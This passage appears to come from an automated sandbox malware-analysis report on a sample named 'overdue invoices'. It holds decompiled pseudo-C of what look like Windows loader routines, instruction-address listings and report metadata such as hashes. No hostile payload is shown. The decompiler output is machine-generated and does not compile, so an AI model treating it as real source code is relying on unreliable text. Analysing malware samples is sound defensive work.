					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0xa88714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E009C2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E009C2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E009958EC(_t240);
									_t221 =  *0xa85cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0xa85cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E009D4A2C(0xa86e40, 0x9d4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E009B7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x975c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E009CF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E009CF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00A17016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L009B2400(_t267 + 0x20);
															}
															L009B2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E009C2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E009B2280(_t134, 0xa88608);
									__eflags =  *0xa86e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										L009AFFB0(_t198, _t241, 0xa88608);
										__eflags = _t253;
										if(_t253 != 0) {
											L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0xa86e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0xa88608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E009C6B90(_t210,  &_v64);
										_t262 =  *0xa88608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E009CE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										L009D97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E009D006A(0xa88608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0xa88608);
												E009DB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0xa86904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0xa86e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								L009AFFB0(_t198, _t240, 0xa88608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E009D00C2(0xa88608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                  0x009c20a0
                  0x009c20a8
                  0x009c20ad
                  0x009c20b3
                  0x009c20b8
                  0x009c20c2
                  0x009c20c7
                  0x009c20cb
                  0x009c20d2
                  0x009c2263
                  0x009c2266
                  0x00a05836
                  0x00a05836
                  0x00000000
                  0x009c226c
                  0x009c226c
                  0x009c2270
                  0x009c2274
                  0x009c20e2
                  0x009c20e2
                  0x009c20e6
                  0x009c20ee
                  0x00a057dc
                  0x00a057de
                  0x00a057ec
                  0x00a057ec
                  0x00a057f1
                  0x00a057f3
                  0x00a057f8
                  0x00000000
                  0x00a057f8
                  0x00a057e0
                  0x00a057e4
                  0x00a057ea
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a057ea
                  0x009c20f4
                  0x009c20f4
                  0x009c20f8
                  0x009c20f8
                  0x009c20fc
                  0x009c2100
                  0x009c2106
                  0x009c2201
                  0x009c2206
                  0x009c220b
                  0x009c220e
                  0x009c22a9
                  0x009c22ac
                  0x00000000
                  0x00000000
                  0x009c22b2
                  0x009c22b5
                  0x00a05801
                  0x00a05806
                  0x00000000
                  0x00000000
                  0x00a05810
                  0x00a05815
                  0x00a05818
                  0x00000000
                  0x00000000
                  0x00a0581e
                  0x009c22bb
                  0x009c22bb
                  0x009c2218
                  0x009c2218
                  0x009c221c
                  0x009c2220
                  0x009c2222
                  0x009c22c2
                  0x009c22c4
                  0x009c22dc
                  0x009c22dc
                  0x009c22e1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009c22e7
                  0x009c22c8
                  0x009c22cd
                  0x009c22d3
                  0x009c22d6
                  0x00a05823
                  0x00a05825
                  0x00a05827
                  0x00000000
                  0x00000000
                  0x00a0582d
                  0x00000000
                  0x00a0582d
                  0x00000000
                  0x009c2228
                  0x009c2228
                  0x00000000
                  0x009c2228
                  0x009c2222
                  0x009c2214
                  0x009c2214
                  0x00000000
                  0x009c2114
                  0x009c2114
                  0x009c2114
                  0x009c211a
                  0x009c211c
                  0x009c2348
                  0x009c234d
                  0x00a05840
                  0x00a05845
                  0x00a05848
                  0x00a0584e
                  0x00a0584e
                  0x00a05848
                  0x009c2353
                  0x009c2355
                  0x009c2388
                  0x009c2388
                  0x009c2368
                  0x009c236a
                  0x009c236c
                  0x009c238f
                  0x00000000
                  0x009c236e
                  0x009c236e
                  0x009c218e
                  0x009c218e
                  0x009c2191
                  0x009c2195
                  0x00a05a03
                  0x00a05a06
                  0x00a05a0c
                  0x00a05a0f
                  0x00a05a11
                  0x00a05a13
                  0x00a05a13
                  0x00a05a19
                  0x00a05a1f
                  0x00000000
                  0x009c219b
                  0x009c219b
                  0x009c21a0
                  0x009c2282
                  0x009c2284
                  0x009c2284
                  0x009c2284
                  0x009c2284
                  0x009c21a6
                  0x009c21a9
                  0x009c21ac
                  0x009c21ae
                  0x009c21b3
                  0x009c228b
                  0x009c2290
                  0x009c2379
                  0x009c2296
                  0x009c2298
                  0x009c2298
                  0x009c2290
                  0x009c21b9
                  0x009c21be
                  0x009c22a2
                  0x009c22a2
                  0x009c21c4
                  0x009c21c8
                  0x009c21cc
                  0x009c21d0
                  0x009c21d4
                  0x009c21de
                  0x009c21e3
                  0x00a05a29
                  0x00a05a2c
                  0x00000000
                  0x00000000
                  0x00a05a3b
                  0x00000000
                  0x009c21e9
                  0x009c21e9
                  0x009c21e9
                  0x009c21ee
                  0x009c21f1
                  0x00a05a45
                  0x00a05a4b
                  0x00a05a52
                  0x00a05a58
                  0x00a05a5d
                  0x00a05a5f
                  0x00a05a71
                  0x00a05a61
                  0x00a05a6a
                  0x00a05a6a
                  0x00a05a76
                  0x00a05a79
                  0x00a05a7f
                  0x00a05a83
                  0x00a05a85
                  0x00a05a87
                  0x00a05a87
                  0x00a05a8c
                  0x00a05a91
                  0x00a05a97
                  0x00a05a9f
                  0x00a05aa0
                  0x00a05aa1
                  0x00a05aa6
                  0x00a05aab
                  0x00a05ab1
                  0x00a05ab3
                  0x00a05ab9
                  0x00a05aca
                  0x00a05ad4
                  0x00a05ad4
                  0x00a05ade
                  0x00a05ade
                  0x00a05aab
                  0x00a05a79
                  0x00a05a52
                  0x009c21f7
                  0x009c21f9
                  0x009c21fe
                  0x009c21fe
                  0x009c21e3
                  0x009c2195
                  0x009c236c
                  0x009c2122
                  0x009c2122
                  0x009c2124
                  0x009c2231
                  0x009c2236
                  0x009c2236
                  0x009c2238
                  0x009c2238
                  0x009c2240
                  0x009c2242
                  0x009c2244
                  0x00a059fc
                  0x009c218c
                  0x009c218c
                  0x00000000
                  0x009c218c
                  0x009c224a
                  0x009c224f
                  0x009c2256
                  0x009c2304
                  0x009c2309
                  0x009c230f
                  0x009c231e
                  0x009c231e
                  0x009c231e
                  0x009c2320
                  0x009c2325
                  0x009c232a
                  0x009c232c
                  0x009c233e
                  0x009c233e
                  0x00000000
                  0x009c232c
                  0x009c2311
                  0x009c2317
                  0x009c231a
                  0x009c231c
                  0x009c2380
                  0x009c2380
                  0x009c2380
                  0x009c2384
                  0x00000000
                  0x00000000
                  0x009c2386
                  0x00000000
                  0x009c231c
                  0x009c225c
                  0x009c225c
                  0x00000000
                  0x009c225c
                  0x009c212a
                  0x009c2134
                  0x009c2138
                  0x009c213d
                  0x00a05858
                  0x00a05863
                  0x00a05863
                  0x00a05867
                  0x00a0586a
                  0x00000000
                  0x00000000
                  0x00a0586c
                  0x00a0586c
                  0x00a05871
                  0x00a05875
                  0x00a05877
                  0x00a05997
                  0x00a0599c
                  0x00a059a1
                  0x00a059a7
                  0x00a059a7
                  0x00000000
                  0x00a059a7
                  0x00a0587d
                  0x00000000
                  0x00a0588b
                  0x00a0588b
                  0x00a05890
                  0x00a05892
                  0x00a05894
                  0x00a05899
                  0x00a0589b
                  0x00a058a0
                  0x00a058a0
                  0x00a058aa
                  0x00a058b2
                  0x00a058b6
                  0x00a058be
                  0x00a058c6
                  0x00a058c9
                  0x00a0590d
                  0x00a05917
                  0x00a0591a
                  0x00a0591c
                  0x00a05920
                  0x00a05928
                  0x00a0592a
                  0x00a0592c
                  0x00a0592e
                  0x00a0592e
                  0x00a058cb
                  0x00a058cd
                  0x00a058d8
                  0x00a058e0
                  0x00a058f4
                  0x00a058fe
                  0x00a058fe
                  0x00a0593a
                  0x00a0593e
                  0x00a05940
                  0x00a05942
                  0x00000000
                  0x00a05944
                  0x00a05944
                  0x00a05949
                  0x00a0594e
                  0x00a0594e
                  0x00a05953
                  0x00a0595b
                  0x00a05976
                  0x00a05976
                  0x00a0597a
                  0x00a0597f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a05981
                  0x00a05981
                  0x00a05981
                  0x00a05983
                  0x00a05988
                  0x00a0598d
                  0x00a05991
                  0x00a05991
                  0x00000000
                  0x00a0595d
                  0x00a0595d
                  0x00a05963
                  0x00a05965
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a05967
                  0x00a05967
                  0x00a0596b
                  0x00a0596d
                  0x00000000
                  0x00000000
                  0x00a0596f
                  0x00a05971
                  0x00a05971
                  0x00a05974
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a05974
                  0x00000000
                  0x00a05967
                  0x00a0595b
                  0x00a05942
                  0x00a05863
                  0x009c2143
                  0x009c2143
                  0x009c2149
                  0x009c214f
                  0x009c22f1
                  0x009c22f6
                  0x00000000
                  0x009c2173
                  0x009c2173
                  0x009c217d
                  0x009c2181
                  0x009c2186
                  0x00a059ae
                  0x00a059b2
                  0x00a059b5
                  0x00a059b7
                  0x00a059ba
                  0x00a059cd
                  0x00a059d1
                  0x00a059d5
                  0x00a059d9
                  0x00a059db
                  0x00000000
                  0x00000000
                  0x00a059dd
                  0x00a059dd
                  0x00a059e1
                  0x00a059e4
                  0x00a059e7
                  0x00a059ee
                  0x00a059ee
                  0x00a059f3
                  0x00a059f3
                  0x00000000
                  0x009c2186
                  0x009c214f
                  0x009c2106
                  0x009c2266
                  0x009c20d8
                  0x009c20da
                  0x009c20e0
                  0x00000000
                  0x00000000
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c23d8bb1f9014714dadde88b3d3305d2a8716d7e63e4c6e87b6b369a0b90e5c6
                  • Instruction ID: 126c5d223ae3fb93f7c1055454b278f814a2f57ade0a7d34dd62a22c1594f52d
                  • Opcode Fuzzy Hash: c23d8bb1f9014714dadde88b3d3305d2a8716d7e63e4c6e87b6b369a0b90e5c6
                  • Instruction Fuzzy Hash: 76F1F031E087459FDB29CB28C840B6B77E5AFD5764F18892DE8999B290D738DC41CB83
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009AD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E009AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xa8d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E009A6600(0xa852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xa87b9c; // 0x0
							_t281 = L009B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E009DF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xa87b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0xa87b8c; // 0x532ad8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E009B2280(_t200, 0xa884d8);
									_t277 =  *0xa885f4; // 0x532fc8
									_t351 =  *0xa885f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x532f60
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									L009AFFB0(_t287, _t353, 0xa884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E009ECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E009A6600(0xa852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E009A7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xa8b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00A1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xa88472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xa8b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xa8b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E009B2280(_t250, 0xa884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L009D3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																L009AFFB0(_t293, _t353, 0xa884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	L009D37F5(_t353, 0);
																}
																E009D0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E009C9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E009C02D6(_t174);
																}
																L009B77F0( *0xa87b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E009CC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L009AEC7F(_t353);
										L009C19B8(_t287, 0, _t353, 0);
										_t200 = E0099F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xa8b2f8 |  *0xa8b2fc) == 0 || ( *0xa8b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return L009DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xa8b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00A46B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00A46AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E009AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
